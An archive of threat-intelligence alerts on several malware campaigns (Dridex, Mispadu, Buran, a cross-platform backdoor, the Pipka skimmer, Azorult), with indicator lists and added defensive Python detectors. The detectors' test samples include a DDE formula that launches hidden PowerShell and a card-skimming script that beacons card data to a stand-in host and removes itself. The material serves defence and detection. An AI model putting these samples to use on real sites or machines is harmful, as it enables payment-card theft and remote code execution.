Archive for category Threats

Rewterz Threat Alert – Malspam Campaigns Spreading Dridex Banking Trojan

Severity

High

Analysis Summary

Dridex, also known as Bugat and Cridex, is a banking trojan that is typically delivered through malicious Microsoft Office macros. Recent malspam campaigns have been observed delivering Dridex to Windows systems. The phishing emails carry a Word or Excel attachment with embedded macros; once the target opens the file and enables macros, the macro downloads Dridex onto the victim machine, which may lead to financial theft.
Its primary objective is to steal banking credentials from infected machines so that fraudulent transactions can be launched immediately. To harvest this data it installs a keystroke logger and performs injection attacks against the victim's browser sessions (web injects).
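The macro-enabled attachment is this campaign's entry point, so a mail gateway or triage script should be able to answer "does this Office file carry a VBA project?" before anyone opens it. The following is an added example written for this page (not Rewterz's code and not anything from the campaign): it checks OOXML attachments for a vbaProject.bin part and for macro-enabled content types using only the standard library, routes legacy OLE .doc/.xls files to manual review because their macro storage needs a CFB parser, and builds its own minimal sample files, which are constructed test inputs rather than real documents.

```python
"""Added example: flag Office attachments that carry VBA macros (standard library only)."""
import io
import zipfile

# Magic bytes of the legacy OLE2/CFB container used by .doc and .xls files.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
ZIP_MAGIC = b"PK\x03\x04"

# Markers found in [Content_Types].xml of macro-enabled OOXML files (.docm/.xlsm):
# the VBA project part type and the "macroEnabled" main-part content types.
MACRO_CONTENT_MARKERS = ("application/vnd.ms-office.vbaProject", "macroEnabled")


def inspect_attachment(data: bytes) -> dict:
    """Classify raw attachment bytes.

    Returns {"container": "ooxml" | "ole" | "other", "has_vba": True/False/None,
             "evidence": [...]}.  has_vba is None for legacy OLE files: the macro
    storage inside them needs a CFB parser (e.g. oletools), so they are routed
    to manual review rather than silently passed.
    """
    evidence = []
    if data.startswith(OLE_MAGIC):
        return {"container": "ole", "has_vba": None,
                "evidence": ["legacy OLE container: inspect with a CFB parser"]}
    if not data.startswith(ZIP_MAGIC):
        return {"container": "other", "has_vba": False, "evidence": evidence}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return {"container": "other", "has_vba": False, "evidence": ["corrupt zip"]}
    with zf:
        for name in zf.namelist():
            if name.lower().endswith("vbaproject.bin"):
                evidence.append(f"VBA project part present: {name}")
        try:
            ctypes = zf.read("[Content_Types].xml").decode("utf-8", "replace")
        except KeyError:
            ctypes = ""
    for marker in MACRO_CONTENT_MARKERS:
        if marker in ctypes:
            evidence.append(f"content type references {marker}")
    return {"container": "ooxml", "has_vba": bool(evidence), "evidence": evidence}


def build_ooxml(with_vba: bool) -> bytes:
    """Construct a minimal OOXML-style zip for testing (constructed input, not a real document)."""
    overrides = []
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if with_vba:
            overrides.append('<Override PartName="/word/vbaProject.bin" '
                             'ContentType="application/vnd.ms-office.vbaProject"/>')
            zf.writestr("word/vbaProject.bin", OLE_MAGIC + b"placeholder")
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                    '<Default Extension="xml" ContentType="application/xml"/>'
                    + "".join(overrides) + "</Types>")
        zf.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in (("macro-enabled", build_ooxml(True)),
                        ("plain", build_ooxml(False)),
                        ("legacy .doc", OLE_MAGIC + b"\x00" * 16)):
        print(label, inspect_attachment(blob))
```

The check deliberately reports legacy OLE files as "unknown" rather than "clean": a gateway that only understands the zip-based formats would otherwise wave through exactly the .doc/.xls attachments that older Dridex campaigns used.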

Impact

  • Theft of banking information
  • Fraudulent transactions
  • Financial loss

Indicators of Compromise

From Email

  • jclugo[@]nanodepot[.]mx
  • comprobantes[@]aviso[.]com[.]gt
  • trafficmxp[@]archive[.]airindia[.]it
  • rh[.]esod[@]atlanticahotels[.]com[.]br
  • atendimento[@]turboautocenter[.]com[.]br
  • info[@]centrotimarzignano[.]it
  • jcarrere[@]bld[.]com[.]ar
  • syful[@]comillaonline[.]com
  • ricardo[@]4rtransportes[.]com[.]br
  • gerentecompras[@]mayoreoferrefama[.]com
  • citas[@]portadacartagena[.]com
  • k-inagaki[@]link-vision[.]com
  • faturamentopm[@]coopmetro[.]com[.]br
  • dvalera[@]abastosbicentenario[.]gob[.]ve
  • ventas3[@]distribuidoradeaceros[.]mx
  • m[.]biec[@]gotec-group[.]com
  • informacion[@]actgrupo[.]com
  • contabilidad[@]insalus[.]es

MD5

  • ba87bd0a355d24ddc39c8cb2c7186abf
  • 05ffb09ff7900cb970c245f94506dd7f
  • 28bdba10872356b1887dcf0b70990ffc
  • a2eb8748c37efcb2ecba817b754d7871
  • 923384cd1063c03f8e0bb44965187be7
  • 9d68dec7048ab46ee26f2cf8ddfec07f
  • 1daef4e6d1e3263d364ca28b599fdd21
  • f506a9e9b77f160026f46947c18a2b8a

SHA-256

  • 6ddf5c04bca8882d1fdb7e4885c86b07876c907bd1fef61cf5545eedfc6b03e7
  • 21de494751a16dca9bce6ace38e1d7be7a7846fb1d9a4a3c4e82b0f9db6e1e0a
  • 690052ad639bf1c44de6fc385247b19f3b4254585208082bb7231cf28c3ff95e
  • d166416b665534fca9dec4b205a0c1f28fdd5dd2cb45b92be8a908c4d35f652a
  • 87011e99a114ccff3994c196876d90e0f8627b2e040884cfbbb44033bbc22ac7
  • 017d4751de322d3cfebbe452f28ea4b16f3412307c6567d9cb7790eac7dc4175
  • 5203f290148afad7aec1493d56c43d0df5710e6a7c23ea2c1326f73ed7861d90
  • 6b1b3cd62ba169a9be6e71d013a52575111b3a15d0cb3bace971031b82057411

Source IP

  • 65[.]99[.]252[.]241
  • 93[.]38[.]63[.]46
  • 103[.]229[.]85[.]12
  • 62[.]112[.]65[.]20
  • 124[.]108[.]39[.]115
  • 190[.]202[.]150[.]26
  • 198[.]1[.]68[.]89
  • 200[.]69[.]233[.]197
  • 162[.]241[.]182[.]168
  • 174[.]142[.]9[.]228
  • 72[.]47[.]249[.]132
  • 91[.]142[.]215[.]72

Remediation

  • Block the threat indicators at their respective controls.
  • Do not download files attached in emails coming from untrusted sources.
  • Do not enable macros for untrusted files.

Rewterz Threat Alert – McDonalds-Themed Facebook Malvertising Deploys Mispadu Banking Trojan

Severity

High

Analysis Summary

The Mispadu banking trojan is using a McDonald's-themed malvertising campaign to steal payment-card data and online banking credentials. Written in Delphi, Mispadu targets Brazil and Mexico, uses pop-up windows to interact with victims and contains backdoor functionality.

[Figure: sponsored Facebook ad offering fake McDonald's discount coupons]

Mispadu spreads via email as well as through sponsored advertisements on Facebook that offer fake McDonald's discount coupons, as shown above. If someone clicks the ad, they are taken to a fake McDonald's website with a button that says "I want!/Generate coupon". Clicking it downloads a ZIP archive containing an MSI installer to the victim machine. The MSI installer sets off a chain of Visual Basic Scripts (VBS) that ends with a loader, which checks the system's language identifier to verify that the victim is indeed in Brazil or Mexico, sets up configuration files, connects to its command-and-control (C2) server and downloads the banking trojan. As for its backdoor functionality, Mispadu can take screenshots, simulate mouse and keyboard actions, and capture keystrokes. It collects fingerprinting information about the victim machine and checks whether regional security applications are installed. It also monitors for installed banking applications, watches the clipboard and tries to replace any Bitcoin wallet address it finds with its own.

The malware also extracts stored credentials from browsers (Google Chrome, Mozilla Firefox, Internet Explorer) and email clients (Microsoft Outlook, Mozilla Thunderbird and Windows Live Mail, among others). Mispadu is an ambitious Latin American banking trojan that uses malvertising and extends its attack surface to web browsers: in Brazil it was seen distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data and to compromise the Boleto payment system. It also collects a list of installed Latin American banking applications and a list of installed security products.
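Mispadu's clipboard trick works because the victim rarely notices that the address they paste differs from the one they copied. As an added example (not part of the original alert and not the malware's own code), the script below validates legacy Base58Check Bitcoin addresses and flags clipboard snapshots in which one valid address is replaced by a different valid address within a short window. The clipboard timeline, the two-second window and the attacker address (derived here from a made-up hash160) are constructed assumptions; only the Bitcoin genesis address is a real-world value.

```python
"""Added example: detect clipboard swaps of Bitcoin addresses (the Mispadu trick)."""
import hashlib

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
SWAP_WINDOW_S = 2.0  # assumption: a human rarely copies two different addresses this fast


def _checksum(payload: bytes) -> bytes:
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]


def b58check_decode(text: str):
    """Return version+hash160 (21 bytes) for a valid Base58Check string, else None."""
    n = 0
    for ch in text:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            return None
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_ones = len(text) - len(text.lstrip("1"))  # each leading '1' encodes a 0x00 byte
    raw = b"\x00" * leading_ones + body
    if len(raw) != 25 or _checksum(raw[:21]) != raw[21:]:
        return None
    return raw[:21]


def b58check_encode(payload: bytes) -> str:
    raw = payload + _checksum(payload)
    n = int.from_bytes(raw, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = B58_ALPHABET[rem] + out
    leading_zeros = len(raw) - len(raw.lstrip(b"\x00"))
    return "1" * leading_zeros + out


def is_btc_address(text: str) -> bool:
    """Legacy mainnet addresses only: version 0x00 (P2PKH) or 0x05 (P2SH)."""
    payload = b58check_decode(text)
    return payload is not None and payload[0] in (0x00, 0x05)


def detect_swaps(events):
    """events: iterable of (timestamp_seconds, clipboard_text) snapshots.

    Flags a swap when one valid address is replaced by a different valid
    address within SWAP_WINDOW_S, which is what a hijacker does right after
    the user copies a payee address.  Returns [(ts, original, replacement)].
    """
    alerts = []
    last_addr = last_ts = None
    for ts, text in events:
        text = text.strip()
        if not is_btc_address(text):
            continue
        if last_addr is not None and text != last_addr and ts - last_ts <= SWAP_WINDOW_S:
            alerts.append((ts, last_addr, text))
        last_addr, last_ts = text, ts
    return alerts


# Constructed clipboard timeline: the user copies the Bitcoin genesis address and
# 200 ms later a hijacker overwrites it with an address derived from a made-up
# hash160.  Sample data only, not observed campaign values.
GENESIS_ADDRESS = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
ATTACKER_ADDRESS = b58check_encode(b"\x00" + bytes(range(1, 21)))
SAMPLE_EVENTS = [
    (0.0, "order #4412"),
    (1.0, GENESIS_ADDRESS),
    (1.2, ATTACKER_ADDRESS),
    (40.0, "thanks"),
]

if __name__ == "__main__":
    for ts, original, replacement in detect_swaps(SAMPLE_EVENTS):
        print(f"t={ts}s clipboard swap: {original} -> {replacement}")
```

In a real monitor the events would come from polling the system clipboard; the detection logic is the same, and the Base58Check validation is what keeps random strings containing digits and letters from producing false swaps.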

Impact

  • Credential Theft
  • Key logging
  • Unauthorized Remote Access
  • Theft of credit card/banking data
  • Financial loss

Indicators of Compromise

Domain Name

promoscupom[.]cf

Hostname

mcdonalds[.]promoscupom[.]cf

MD5

  • 525e86186b017bfbbdef82802dba6950
  • 54e8ded7b148a13d3363ac7b33f6eb06
  • 0ea4196141215c3148054f029fc9c96a
  • 053d613849ee008f5a1967bf0219d406
  • 024ff6c7fff97103fe81120aea96da94
  • e60bad975bbec25fe5d26298a3eafbe4

SHA-256

  • 0e3c89fa4d61b5430e3a0949b86058b0873f4c807cba87d687c81d3ad4412ed4
  • 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
  • 8b9e03bea2dfc1ce375cbff63927b7f0f51cbd0d8e74557e9a54c9a361e709b0
  • f3e6a1dbb374e4926f55d3905c70bf30ee59281de6fa96aa34ba6d9e624a8b0e
  • 6ed32f46a595a4097d85e7f70c74be5a57b542595088e81074ad8197901ba7aa

URL

  • http[:]//mcdonalds[.]promoscupom[.]cf/index1[.]html
  • http[:]//promoscupom[.]cf/
  • http[:]//3[.]19[.]223[.]147/br/mp1a
  • http[:]//mcdonalds[.]promoscupom[.]cf/index3[.]html
  • http[:]//mcdonalds[.]promoscupom[.]cf/index2[.]html

Remediation

  • Block the threat indicators at their respective controls.
  • Do not click on advertisements offering unexpected discounts or coupons, even if they look legitimate and harmless.
  • Keep browsers updated to latest versions and avoid using unnecessary extensions.

Rewterz Threat Alert – Buran Ransomware Infects PCs via Microsoft Excel Web Queries

Severity

High

Analysis Summary

A new spam campaign has been spotted distributing the Buran Ransomware through IQY file attachments. When opened, these Microsoft Excel Web Query attachments will execute a remote command that installs the ransomware onto a victim’s computer.

A new malspam campaign discovered by the security researcher known as Suspicious Link pretends to be a simple forward of a previous email and tells the recipient to "Print document in attach".

[Figure: the malspam email]

The attached document is an IQY file that, when opened, executes a web query against a remote server; the server's response is a formula that uses PowerShell to install the Buran Ransomware. IQY files are Excel Web Query documents that, when opened, import data into a worksheet from an external source. As shown below, the attached IQY file is simply a text file specifying that its data will come from the web and be retrieved from the listed URL.

[Figure: contents of the IQY attachment]

The data returned from the external source can itself be a formula, which Excel evaluates when the IQY file is opened. In this case the formula launches a PowerShell command that downloads a remote Buran Ransomware executable named 1.exe, saves it to the Temp folder and executes it.

[Figure: the remote command returned by the server]

As with malicious macros, the user first has to enable the external data connection, but as we have seen with other spam campaigns, too many people blindly click the Enable button.

[Figure: Excel's security prompt for the IQY file]

If the user clicks on Enable, the 1.exe file will be downloaded and executed, which will start to encrypt the files on the computer.

[Figure: files encrypted by Buran]
[Figure: Buran ransom note]
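To make the IQY mechanism concrete, here is an added example (written for this page, not the campaign's file or the researcher's analysis) that parses the fixed layout of a .iqy file, applies the policy checks a mail gateway would run on its data-source URL, and inspects a server response for formulas, distinguishing DDE-style command formulas of the =cmd| form that launch a program from ordinary spreadsheet formulas. The sample query file, its URL, the allow-listed host and the response body are constructed placeholders, not the real campaign artifacts.

```python
"""Added example: parse an Excel Web Query (.iqy) file and the data it pulls."""
import re
from urllib.parse import urlsplit

# DDE-style command formulas that make Excel launch a program, e.g. =cmd|' /C ...'!A0
DDE_COMMAND = re.compile(r"^\s*=\s*(cmd|msexcel|excel|powershell|mshta|rundll32)\s*\|", re.I)


def parse_iqy(text: str) -> dict:
    """Split an .iqy into its fixed fields: 'WEB', a version line, the URL,
    optional POST parameters, then Name=Value settings after a blank line."""
    lines = text.splitlines()
    if len(lines) < 3 or lines[0].strip().upper() != "WEB":
        raise ValueError("not a WEB query file")
    url = lines[2].strip()
    post, settings, seen_blank = [], {}, False
    for line in lines[3:]:
        if not seen_blank:
            if line.strip() == "":
                seen_blank = True
            else:
                post.append(line.strip())
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            settings[key.strip()] = value.strip()
    return {"version": lines[1].strip(), "url": url,
            "post": "\n".join(post), "settings": settings}


def assess_iqy(text: str, allowed_hosts) -> list:
    """Policy checks a gateway or EDR rule can apply before Excel ever opens the file."""
    query = parse_iqy(text)
    parts = urlsplit(query["url"])
    findings = []
    if parts.scheme != "https":
        findings.append(f"cleartext or non-web scheme: {parts.scheme or '(none)'}")
    host = (parts.hostname or "").lower()
    if host not in {h.lower() for h in allowed_hosts}:
        findings.append(f"data source host not allow-listed: {host or '(none)'}")
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
        findings.append("data source is a bare IP address")
    return findings


def assess_response(body: str) -> list:
    """Inspect what the server returns.  Any cell beginning with '=' is a formula
    Excel evaluates on import; a DDE command formula executes a program."""
    hits = []
    for row in body.splitlines():
        for cell in row.split("\t"):
            cell = cell.strip()
            if cell.startswith("="):
                kind = "dde-command" if DDE_COMMAND.match(cell) else "formula"
                hits.append((kind, cell))
    return hits


# Constructed samples (not the campaign's real file or server response).
SAMPLE_IQY = (
    "WEB\n"
    "1\n"
    "http://203.0.113.10/print/document.iqy\n"
    "\n"
    "Selection=AllTables\n"
    "Formatting=None\n"
    "PreFormattedTextToColumns=True\n"
)
SAMPLE_RESPONSE = (
    "=cmd|' /C powershell -nop -w hidden -c \"<download-and-run placeholder>\"'!A0\n"
)

if __name__ == "__main__":
    print(assess_iqy(SAMPLE_IQY, allowed_hosts={"data.intranet.example"}))
    print(assess_response(SAMPLE_RESPONSE))
```

Note that the attachment itself contains nothing malicious to signature: the payload lives entirely in the server response, so the useful gateway decision is about the data-source host, not about the file's content.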

Impact

File encryption

Remediation

  • Always be suspicious about emails sent by unknown senders.
  • Never click on the links/attachments sent by unknown senders.
  • Block IQY attachments at the mail gateway; Excel's Trust Center external-content settings can also be configured to block untrusted query files such as .iqy.

Rewterz Threat Alert – A New Multiplatform Backdoor Targeting Linux

Severity

Medium

Analysis Summary

A new multiplatform backdoor with Linux and Windows variants has been identified. It has no known connections to other threat groups.

Technical Analysis

The Linux binary is a statically linked ELF file, while the Windows binary is a dynamically linked PE file.
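The linking difference noted above is something an analyst checks first, because a statically linked ELF carries its own libc and leaves no dynamic-symbol trail for tools that lean on imports. As an added example for this page (not from the original analysis), the script below reads an ELF's program headers directly and reports whether it carries PT_INTERP and PT_DYNAMIC, handling 32- and 64-bit files and both byte orders. The two ELF blobs it builds are constructed header-only test inputs, not the samples from this alert, and the PE side of the comparison is not covered.

```python
"""Added example: tell a statically linked ELF from a dynamically linked one."""
import struct

PT_DYNAMIC, PT_INTERP = 2, 3
EHDR_FMT = {1: "16sHHIIIIIHHHHHH", 2: "16sHHIQQQIHHHHHH"}   # ELFCLASS32 / ELFCLASS64
PHDR_FMT = {1: "IIIIIIII", 2: "IIQQQQQQ"}


def elf_linkage(data: bytes) -> dict:
    """Walk the program headers and report PT_INTERP / PT_DYNAMIC.

    A classic static binary has neither; a normal dynamic executable has both.
    (A static-PIE has PT_DYNAMIC but no PT_INTERP, so both flags are returned.)
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    endian = {1: "<", 2: ">"}[ei_data]
    ehdr = struct.unpack_from(endian + EHDR_FMT[ei_class], data, 0)
    e_phoff, e_phentsize, e_phnum = ehdr[5], ehdr[9], ehdr[10]
    interp, has_dynamic = None, False
    for i in range(e_phnum):
        ph = struct.unpack_from(endian + PHDR_FMT[ei_class], data, e_phoff + i * e_phentsize)
        if ei_class == 2:   # Elf64_Phdr: type, flags, offset, vaddr, paddr, filesz, memsz, align
            p_type, p_offset, p_filesz = ph[0], ph[2], ph[5]
        else:               # Elf32_Phdr: type, offset, vaddr, paddr, filesz, memsz, flags, align
            p_type, p_offset, p_filesz = ph[0], ph[1], ph[4]
        if p_type == PT_INTERP:
            interp = data[p_offset:p_offset + p_filesz].rstrip(b"\x00").decode("ascii", "replace")
        elif p_type == PT_DYNAMIC:
            has_dynamic = True
    return {"class": 32 if ei_class == 1 else 64, "interp": interp,
            "dynamic": has_dynamic, "static": interp is None and not has_dynamic}


def build_elf64(phdrs, tail: bytes = b"") -> bytes:
    """Construct a header-only little-endian x86-64 ELF for testing.
    phdrs: list of (p_type, p_offset, p_filesz).  Constructed input, not a runnable binary."""
    e_ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    ehdr = struct.pack("<" + EHDR_FMT[2], e_ident, 2, 62, 1, 0x401000,
                       64, 0, 0, 64, 56, len(phdrs), 64, 0, 0)
    body = b"".join(struct.pack("<" + PHDR_FMT[2], t, 5, off, 0, 0, sz, sz, 1)
                    for t, off, sz in phdrs)
    return ehdr + body + tail


INTERP = b"/lib64/ld-linux-x86-64.so.2\x00"
_interp_off = 64 + 56 * 3
DYNAMIC_SAMPLE = build_elf64([(1, 0, _interp_off + len(INTERP)),
                              (PT_INTERP, _interp_off, len(INTERP)),
                              (PT_DYNAMIC, 0, 0)], INTERP)
STATIC_SAMPLE = build_elf64([(1, 0, 64 + 56)])

if __name__ == "__main__":
    import sys
    if sys.argv[1:]:
        for path in sys.argv[1:]:
            with open(path, "rb") as fh:
                print(path, elf_linkage(fh.read()))
    else:
        print("dynamic sample:", elf_linkage(DYNAMIC_SAMPLE))
        print("static sample: ", elf_linkage(STATIC_SAMPLE))
```

Run it with one or more file paths to classify real samples; with no arguments it classifies the two constructed blobs. The PT_INTERP string is also worth recording as an indicator of the build environment (glibc vs. musl loaders, for instance).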

Both instances of this malware are practically identical in terms of overall functionality, with minor implementation differences. However, if we pay close attention to each instance we can draw some conclusions regarding the nature of the authors.

Both malware instances share the same protocol to communicate with the same CNC server. However, these instances have different delivery vectors:

[Screenshot: delivery vectors of the two variants]

Backdoor Analysis

The Windows variant of this malware does not represent a complex threat in terms of Windows malware. Conversely, the Linux variant shows more sophistication in regards to the implementation details used to replicate the same functionality.

[Screenshot omitted]

This detail indicates the malware authors' preferred development environment.

The main function is not obfuscated and appears to be straightforward in logic. In the Windows variant we can see how some strings are decoded in the beginning of the function.

[Screenshots of the main function omitted]

Impact

  • Arbitrary execution of shell commands
  • Arbitrary binary execution

Indicators of Compromise

IP

  • 185[.]198[.]56[.]53
  • 193[.]29[.]15[.]147

SHA-256

  • 5d51dbf649d34cd6927efdb6ef082f27a6ccb25a92e892800c583a881bbf9415
  • 907e1dfde652b17338d307b6a13a5af7a8f6ced93a7a71f7f65d40123b93f2b8

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the links/attachments sent by unknown senders.

Rewterz Threat Alert – New JavaScript Skimmer Found on Ecommerce Sites

Severity

Medium

Analysis summary

Security researchers at Visa have uncovered a new type of JavaScript skimmer that has infected the online checkout pages for at least 17 ecommerce websites in an effort to steal payment card data. This newly discovered skimmer, dubbed “Pipka,” has the ability to remove itself from the HTML of a compromised payment website after it executes, enabling it to avoid security detection, according to the Visa researchers.

After first finding Pipka, the Visa researchers discovered the skimmer on at least 16 other online checkout pages at ecommerce sites. As with other skimmers, Pipka is designed to extract payment card account number, expiration date, card verification value number, cardholder name and address.

[Figure: Pipka skimmer code]

The creators of Pipka incorporated the self-removal technique as an extra layer of defense against security software. And while this type of avoidance technique has been spotted with desktop malware, it has not been previously incorporated into JavaScript skimmers.
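Because Pipka deletes its own script element after running, a scanner that inspects the live DOM will not see it; the place to look is the HTML as served, compared against a baseline. The following added example (written for this page; it is not Pipka's code and not the Visa researchers' detection) collects every script from raw checkout HTML, hashes inline scripts against a known-good set, and flags scripts that read card fields and send data out, call hosts outside an allow-list, or remove themselves from the DOM. The sample page, the skimmer-like snippet, the host names and the regex patterns are constructed for illustration.

```python
"""Added example: find skimmer-like inline scripts in raw checkout HTML."""
import hashlib
import re
from html.parser import HTMLParser

# Constructed heuristics; tune them to the field names your checkout actually uses.
CARD_FIELDS = re.compile(r"card\s*number|cardnumber|ccnum|cvv|cvc|expir", re.I)
EXFIL_CALLS = re.compile(r"XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image\s*\(|\.src\s*=", re.I)
SELF_REMOVAL = re.compile(
    r"currentScript\s*\.\s*remove\s*\(|removeChild\s*\(\s*(?:document\.)?currentScript"
    r"|parentNode\s*\.\s*removeChild", re.I)
HOSTS = re.compile(r"https?://([a-z0-9.-]+)", re.I)


class ScriptCollector(HTMLParser):
    """Collect every <script> as (src, inline_text) from raw HTML."""
    def __init__(self):
        super().__init__()
        self.scripts, self._buf, self._src, self._inside = [], [], None, False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._inside, self._src, self._buf = True, dict(attrs).get("src"), []

    def handle_data(self, data):
        if self._inside:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._inside:
            self.scripts.append((self._src, "".join(self._buf)))
            self._inside = False


def script_hash(text: str) -> str:
    return hashlib.sha256(text.strip().encode("utf-8")).hexdigest()


def scan_checkout_html(html: str, trusted_hosts, known_hashes) -> list:
    """Score each script in the server-side HTML (not the live DOM, where a
    self-deleting skimmer is already gone).  A script is suspicious when it is
    not in the baseline and either touches card fields and sends data out, or
    removes itself, or talks to a host outside the allow-list."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for index, (src, text) in enumerate(collector.scripts):
        flags = set()
        if CARD_FIELDS.search(text):
            flags.add("card_fields")
        if EXFIL_CALLS.search(text):
            flags.add("exfil")
        if SELF_REMOVAL.search(text):
            flags.add("self_removal")
        hosts = {h.lower() for h in HOSTS.findall(text)}
        if src:
            m = HOSTS.match(src)
            if m:
                hosts.add(m.group(1).lower())
        untrusted = sorted(h for h in hosts if h not in trusted_hosts)
        digest = script_hash(text) if text.strip() else None
        known = (digest in known_hashes) if digest else (not untrusted)
        suspicious = (not known) and (
            {"card_fields", "exfil"} <= flags or "self_removal" in flags or bool(untrusted))
        findings.append({"index": index, "src": src, "sha256": digest, "flags": sorted(flags),
                         "untrusted_hosts": untrusted, "suspicious": suspicious})
    return findings


# Constructed checkout page: one baseline inline script, one skimmer-like script
# that reads the card fields, beacons them out and deletes its own element, and
# one external script from the shop's own CDN.  None of this is Pipka's code.
SAMPLE_HTML = """<html><body>
<form id="checkout"><input name="cardnumber"><input name="cvv"></form>
<script>window.dataLayer=[];</script>
<script>
(function(){var s=document.currentScript;
document.querySelector('#checkout').addEventListener('submit',function(){
  var d={n:document.querySelector('[name=cardnumber]').value,
         c:document.querySelector('[name=cvv]').value};
  new Image().src='https://stats.example.invalid/p?'+btoa(JSON.stringify(d));
});
s.parentNode.removeChild(s);})();
</script>
<script src="https://cdn.shop.example/app.js"></script>
</body></html>"""

if __name__ == "__main__":
    baseline = {script_hash("window.dataLayer=[];")}
    for f in scan_checkout_html(SAMPLE_HTML, {"cdn.shop.example"}, baseline):
        print(f)
```

The baseline hashes come from the page as it should look (a release artifact or a clean crawl); any inline script that is not in that set is worth a look regardless of the heuristics, since attackers change variable names more readily than they stop reading the card-number field.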

Impact

Financial loss

Remediation

  • Ensure the e-commerce shopping cart, other services and all supporting software are patched or upgraded regularly.
  • Scan and test for vulnerabilities and malware regularly, including the raw HTML and JavaScript served on checkout pages.
  • Implement best practices for securing e-commerce sites.

Rewterz Threat Alert – Azorult Malware – Active IoCs

Severity

High

Analysis Summary

Active indicators of compromise linked to the Azorult stealer have been retrieved; the listed infrastructure and samples are used to infect victims with Azorult.

AZORult is a Trojan stealer that collects various data on infected computers and sends it to the C&C server, including browser history, login credentials, cookies, files from folders as specified by the C&C server (for example, all TXT files from the Desktop folder), cryptowallet files, etc.

The malware can also be used as a loader to download other malware. Indicators of compromise are given below.

Impact

  • Credential Theft
  • Exposure of sensitive information

Indicators of Compromise

Domain Name

dark-team[.]pw

MD5

  • 622e4013a109c98ba384b8ae94ad1c80
  • 8a409f6268cb227a491ebb833233605b
  • cf964e65a1be0be2335c69886108601e

SHA-256

  • 1e880dce0c52262a8c7c2dc3ed5b5daf0391ba58f77e3a48ef5e3c915bbcb7ad
  • 29e50b5023569b3456abfae6a9c217ebfe35d96539cea8b2e3bef63bc3fee326
  • 253c3edecb73720d031f2bc91d032f8e2092fb239808e2c7070fc9bb82d31826

SHA-1

  • f7cf88068f3909f4459e98bbe2e66ecd89a86975
  • f0592fc9980dc22f05d467801246cde6d81a5130
  • fd672d3b705dc0515bb38f513581edcf9d3f0a74

Remediation

  • Block the threat indicators at their respective controls.
  • Do not download/execute untrusted files.
  • Do not respond to untrusted emails.
  • Do not visit links attached in untrusted emails.

Copyright © Rewterz. All rights reserved.